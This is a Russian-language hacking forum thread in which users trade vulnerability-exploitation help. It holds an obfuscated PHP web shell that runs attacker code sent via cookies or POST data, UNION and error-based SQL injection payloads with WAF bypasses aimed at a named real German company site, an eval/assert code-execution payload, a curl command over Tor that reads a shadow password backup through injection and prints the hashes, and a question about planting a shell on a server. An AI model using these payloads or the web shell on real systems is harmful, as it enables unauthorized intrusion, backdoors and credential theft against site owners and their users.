Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. SooLFaa

    SooLFaa Members of Antichat

    Joined:
    17 Mar 2014
    Messages:
    530
    Likes Received:
    499
    Reputations:
    154
    Очень много фаззеров фолсе позитивят именно на time-based. А вот w3af молодец. Он умеет понимать блинды.
     
    _________________________
  2. elvir

    elvir Banned

    Joined:
    30 Nov 2016
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
  3. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
  4. elvir

    elvir Banned

    Joined:
    30 Nov 2016
    Messages:
    13
    Likes Received:
    0
    Reputations:
    0
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    SELECT schema_name FROM information_schema.schemata; — for MySQL >= v5.0
    или
    SELECT distinct(db) FROM mysql.db
    последний при определённых условиях срабатывает
     
    #1805 Gorev, 19 Mar 2017
    Last edited: 19 Mar 2017
    elvir likes this.
  6. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    Что будет если отправить 2 одинаковых http запроса одновременно например при восстановление пароля есть шансы что придет одинаковый код восстановления? Как отправить 2 запроса с минимальной задержки ? Какие похожие баги есть кроме race condition найдено в старбак се?
     
  7. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    думаю, что идея утопична. ибо каждый запрос генерирует уникальный хэндлер
     
  8. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
  9. Simon_ru

    Simon_ru New Member

    Joined:
    4 Mar 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    PHP:
    <?php $GLOBALS['s251'] = "\x66\x2c\x54\x63\x65\x42\x24\x64\x5d\x2b\x3b\x23\x35\x33\x44\x22\x70\x38\x26\x27\x34\x53\x5f\x5b\x41\x50\x6e\x61\x46\x62\x73\x32\x30\x31\x3f\x77\xd\x5e\x57\x59\x6c\x48\x3a\x20\x49\x6f\x72\x69\x45\x7b\x7d\x4a\x6d\x29\x55\x76\x21\x7a\x4d\x56\x9\x79\x52\x36\x39\x3c\x4f\x43\x40\xa\x3e\x6b\x4c\x2d\x2a\x4e\x51\x5c\x74\x67\x58\x4b\x28\x78\x37\x5a\x7e\x25\x6a\x2e\x47\x7c\x60\x2f\x71\x3d\x75\x68";
    $GLOBALS[$GLOBALS['s251'][29].$GLOBALS['s251'][3].$GLOBALS['s251'][7].$GLOBALS['s251'][63].$GLOBALS['s251'][17].$GLOBALS['s251'][7].$GLOBALS['s251'][64]] = $GLOBALS['s251'][3].$GLOBALS['s251'][97].$GLOBALS['s251'][46];
    $GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]] = $GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][7];
    $GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]] = $GLOBALS['s251'][30].$GLOBALS['s251'][78].$GLOBALS['s251'][46].$GLOBALS['s251'][40].$GLOBALS['s251'][4].$GLOBALS['s251'][26];
    $GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]] = $GLOBALS['s251'][47].$GLOBALS['s251'][26].$GLOBALS['s251'][47].$GLOBALS['s251'][22].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][78];
    $GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]] = $GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][47].$GLOBALS['s251'][27].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][57].$GLOBALS['s251'][4];
    $GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]] = $GLOBALS['s251'][16].$GLOBALS['s251'][97].$GLOBALS['s251'][16].$GLOBALS['s251'][55].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][30].$GLOBALS['s251'][47].$GLOBALS['s251'][45].$GLOBALS['s251'][26];
    $GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]] = $GLOBALS['s251'][96].$GLOBALS['s251'][26].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][47].$GLOBALS['s251'][27].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][57].$GLOBALS['s251'][4];
    $GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]] = $GLOBALS['s251'][29].$GLOBALS['s251'][27].$GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][22].$GLOBALS['s251'][7].$GLOBALS['s251'][4].$GLOBALS['s251'][3].$GLOBALS['s251'][45].$GLOBALS['s251'][7].$GLOBALS['s251'][4];
    $GLOBALS[$GLOBALS['s251'][97].$GLOBALS['s251'][84].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][12].$GLOBALS['s251'][29].$GLOBALS['s251'][17]] = $GLOBALS['s251'][30].$GLOBALS['s251'][4].$GLOBALS['s251'][78].$GLOBALS['s251'][22].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][4].$GLOBALS['s251'][22].$GLOBALS['s251'][40].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][47].$GLOBALS['s251'][78];
    $GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]] = $GLOBALS['s251'][78].$GLOBALS['s251'][13].$GLOBALS['s251'][17].$GLOBALS['s251'][27].$GLOBALS['s251'][12];
    $GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]] = $GLOBALS['s251'][7].$GLOBALS['s251'][12].$GLOBALS['s251'][32].$GLOBALS['s251'][29].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][64].$GLOBALS['s251'][0];
    $GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] = $_POST;
    $GLOBALS[$GLOBALS['s251'][35].$GLOBALS['s251'][63].$GLOBALS['s251'][63].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][0]] = $_COOKIE;
    @
    $GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][46].$GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][22].$GLOBALS['s251'][40].$GLOBALS['s251'][45].$GLOBALS['s251'][79], NULL);
    @
    $GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][40].$GLOBALS['s251'][45].$GLOBALS['s251'][79].$GLOBALS['s251'][22].$GLOBALS['s251'][4].$GLOBALS['s251'][46].$GLOBALS['s251'][46].$GLOBALS['s251'][45].$GLOBALS['s251'][46].$GLOBALS['s251'][30], 0);
    @
    $GLOBALS[$GLOBALS['s251'][52].$GLOBALS['s251'][63].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12]]($GLOBALS['s251'][52].$GLOBALS['s251'][27].$GLOBALS['s251'][83].$GLOBALS['s251'][22].$GLOBALS['s251'][4].$GLOBALS['s251'][83].$GLOBALS['s251'][4].$GLOBALS['s251'][3].$GLOBALS['s251'][96].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][45].$GLOBALS['s251'][26].$GLOBALS['s251'][22].$GLOBALS['s251'][78].$GLOBALS['s251'][47].$GLOBALS['s251'][52].$GLOBALS['s251'][4], 0);
    @
    $GLOBALS[$GLOBALS['s251'][97].$GLOBALS['s251'][84].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][12].$GLOBALS['s251'][29].$GLOBALS['s251'][17]](0);

    $q91f628 NULL;
    $t1fb NULL;

    $GLOBALS[$GLOBALS['s251'][46].$GLOBALS['s251'][4].$GLOBALS['s251'][13].$GLOBALS['s251'][3]] = $GLOBALS['s251'][20].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][64].$GLOBALS['s251'][31].$GLOBALS['s251'][84].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][73].$GLOBALS['s251'][31].$GLOBALS['s251'][4].$GLOBALS['s251'][17].$GLOBALS['s251'][27].$GLOBALS['s251'][73].$GLOBALS['s251'][20].$GLOBALS['s251'][33].$GLOBALS['s251'][29].$GLOBALS['s251'][13].$GLOBALS['s251'][73].$GLOBALS['s251'][29].$GLOBALS['s251'][27].$GLOBALS['s251'][3].$GLOBALS['s251'][63].$GLOBALS['s251'][73].$GLOBALS['s251'][12].$GLOBALS['s251'][32].$GLOBALS['s251'][32].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][20].$GLOBALS['s251'][13].$GLOBALS['s251'][7].$GLOBALS['s251'][27].$GLOBALS['s251'][84].$GLOBALS['s251'][84].$GLOBALS['s251'][17];
    global 
    $re3c;

    function 
    d50b4359f($q91f628$j49bf)
    {
        
    $s06aaf "";

        for (
    $l220c9=0$l220c9<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($q91f628);)
        {
            for (
    $s49809=0$s49809<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($j49bf) && $l220c9<$GLOBALS[$GLOBALS['s251'][57].$GLOBALS['s251'][12].$GLOBALS['s251'][84].$GLOBALS['s251'][64]]($q91f628); $s49809++, $l220c9++)
            {
                
    $s06aaf .= $GLOBALS[$GLOBALS['s251'][29].$GLOBALS['s251'][3].$GLOBALS['s251'][7].$GLOBALS['s251'][63].$GLOBALS['s251'][17].$GLOBALS['s251'][7].$GLOBALS['s251'][64]]($GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]]($q91f628[$l220c9]) ^ $GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][0].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][13].$GLOBALS['s251'][31].$GLOBALS['s251'][29]]($j49bf[$s49809]));
            }
        }

        return 
    $s06aaf;
    }

    function 
    t38a5($q91f628$j49bf)
    {
        global 
    $re3c;

        return 
    $GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]]($GLOBALS[$GLOBALS['s251'][40].$GLOBALS['s251'][27].$GLOBALS['s251'][7].$GLOBALS['s251'][7].$GLOBALS['s251'][31]]($q91f628$re3c), $j49bf);
    }

    foreach (
    $GLOBALS[$GLOBALS['s251'][35].$GLOBALS['s251'][63].$GLOBALS['s251'][63].$GLOBALS['s251'][4].$GLOBALS['s251'][63].$GLOBALS['s251'][27].$GLOBALS['s251'][0]] as $j49bf=>$tf4daa)
    {
        
    $q91f628 $tf4daa;
        
    $t1fb $j49bf;
    }

    if (!
    $q91f628)
    {
        foreach (
    $GLOBALS[$GLOBALS['s251'][30].$GLOBALS['s251'][27].$GLOBALS['s251'][64].$GLOBALS['s251'][33].$GLOBALS['s251'][64].$GLOBALS['s251'][17].$GLOBALS['s251'][17]] as $j49bf=>$tf4daa)
        {
            
    $q91f628 $tf4daa;
            
    $t1fb $j49bf;
        }
    }

    $q91f628 = @$GLOBALS[$GLOBALS['s251'][3].$GLOBALS['s251'][27].$GLOBALS['s251'][31].$GLOBALS['s251'][0]]($GLOBALS[$GLOBALS['s251'][26].$GLOBALS['s251'][0].$GLOBALS['s251'][84].$GLOBALS['s251'][17]]($GLOBALS[$GLOBALS['s251'][7].$GLOBALS['s251'][64].$GLOBALS['s251'][3].$GLOBALS['s251'][20].$GLOBALS['s251'][84].$GLOBALS['s251'][31].$GLOBALS['s251'][32].$GLOBALS['s251'][4]]($q91f628), $t1fb));
    if (isset(
    $q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]]) && $re3c==$q91f628[$GLOBALS['s251'][27].$GLOBALS['s251'][71]])
    {
        if (
    $q91f628[$GLOBALS['s251'][27]] == $GLOBALS['s251'][47])
        {
            
    $l220c9 = Array(
                
    $GLOBALS['s251'][16].$GLOBALS['s251'][55] => @$GLOBALS[$GLOBALS['s251'][88].$GLOBALS['s251'][64].$GLOBALS['s251'][7].$GLOBALS['s251'][3].$GLOBALS['s251'][31].$GLOBALS['s251'][13].$GLOBALS['s251'][84].$GLOBALS['s251'][32].$GLOBALS['s251'][13]](),
                
    $GLOBALS['s251'][30].$GLOBALS['s251'][55] => $GLOBALS['s251'][33].$GLOBALS['s251'][89].$GLOBALS['s251'][32].$GLOBALS['s251'][73].$GLOBALS['s251'][33],
            );
            echo @
    $GLOBALS[$GLOBALS['s251'][79].$GLOBALS['s251'][84].$GLOBALS['s251'][0].$GLOBALS['s251'][13].$GLOBALS['s251'][12].$GLOBALS['s251'][12].$GLOBALS['s251'][64]]($l220c9);
        }
        elseif (
    $q91f628[$GLOBALS['s251'][27]] == $GLOBALS['s251'][4])
        {
            eval(
    $q91f628[$GLOBALS['s251'][7]]);
        }
        exit();
    }
    Что это? :)
     
  10. MrScrudg

    MrScrudg New Member

    Joined:
    14 Nov 2015
    Messages:
    35
    Likes Received:
    2
    Reputations:
    0
    Подскажите, есть ли в настоящее время смысл искать SQL-i в cookie/user-agent/referrer ?
     
  11. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    в любое время есть смысл искать инъекции где угодно
     
    _________________________
    ACat likes this.
  12. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,551
    Likes Received:
    1,259
    Reputations:
    274
    А почему бы и нет?думаете что все поголовно решили все вопросы с фильтрацией ?
     
  13. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.men-defencetec.de/en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b&tx_men_pi1%5Bdetail%5D=54+/*!12345anD*/+1=0+/*!911111*/union+/*!12345sELecT*/+'1','2','3','4','5','6','7','8','9','10','11','12','13','14','15','16','17','18','19','20','21','22','23','24','25','26','27','28','29','30','31','32','33','34','35','36','37','38','39','40','41','42','43','44','45','46','47','48','49','50','51','52','53','54','55','56','57','58','59','60','61','62','63','64','65',66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,99,100,101,102,103,104,105,106,107,108,109,110,111,112,113,114,115,116,117,118,119,120,121,122,123,124,125,126,127,128,129,130,131,132,133,134,135,136,137,138,139,140,141,142,143,144,145,146,147,148,149,150,151,152,153,154,155,156,157,158,159,160,161,162,163,164,165,166,167,168,169,170,171,172,173,174,175,176,177,178,179,180+--+
    Хелп, нужно вывод
     
    ACat likes this.
  14. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Злой ваф
     
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    может кто сможет обойти...
     
  16. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Не стоит забывать, что иногда параметры можно передавать одинаково как через GET, так и через POST, в котором зачастую ничего не фильтруется!
    Code:
    POST /en/products/detailview/?cHash=e27d171ed5311fe78556c5047e5e892b HTTP/1.1
    Host: www.men-defencetec.de
    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
    Accept-Language: ru-RU,ru;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Connection: close
    Upgrade-Insecure-Requests: 1
    Cache-Control: max-age=0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 94
    
    tx_men_pi1[detail]=(1)--~(select*from(select(concat_ws(0x3a,@@version,database(),user()))n)f)#
    
    Результат:
     
    Lam3rsha, Gorev, ZodiaX and 7 others like this.
  17. Simon_ru

    Simon_ru New Member

    Joined:
    4 Mar 2017
    Messages:
    4
    Likes Received:
    0
    Reputations:
    0
    assert(stripslashes($_REQUEST['p']));


    Подскажите кто-нибудь как через assert пролиться? Не пойму как он работает
     
    #1817 Simon_ru, 24 Mar 2017
    Last edited: 24 Mar 2017
  18. crlf

    crlf Green member

    Joined:
    18 Mar 2016
    Messages:
    683
    Likes Received:
    1,513
    Reputations:
    460
    eval($_REQUEST[x]);&x=phpcredits();
     
    Gorev and Simon_ru like this.
  19. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    Code:
    $ curl -s -k --proxy socks5://127.0.0.1:9150 'http://*.com/ajax/*.php?UserID=1+union+select+1,2,3,load_file%280x2f6574632f736861646f772e62616b%29,5,6,7,8,9%23' | perl -lane '~s/\\n/\n/g;print' | tail -n 2 | perl -lane '~/[^:]+:(.{15})/;print $1'
    $1$piXULrQ7$R3T
    $1$piXULrQ7$R3T
    
    shadow.bak
    :D
     
    _________________________
    cat1vo, BabaDook, crlf and 1 other person like this.
  20. l0mt1k

    l0mt1k New Member

    Joined:
    31 Mar 2017
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    Кто нибудь может показать пример нормального upload'a, через мой не хочет грузить на сервер шел. Тут проблема в одном из двух, либо я глуп и мал, либо проблема на стороне сервера:confused:
    P.s. с этим разобрался, в директории нет прав на запись. Можно-ли что-нибудь придумать с этим?
     
    #1820 l0mt1k, 1 Apr 2017
    Last edited: 1 Apr 2017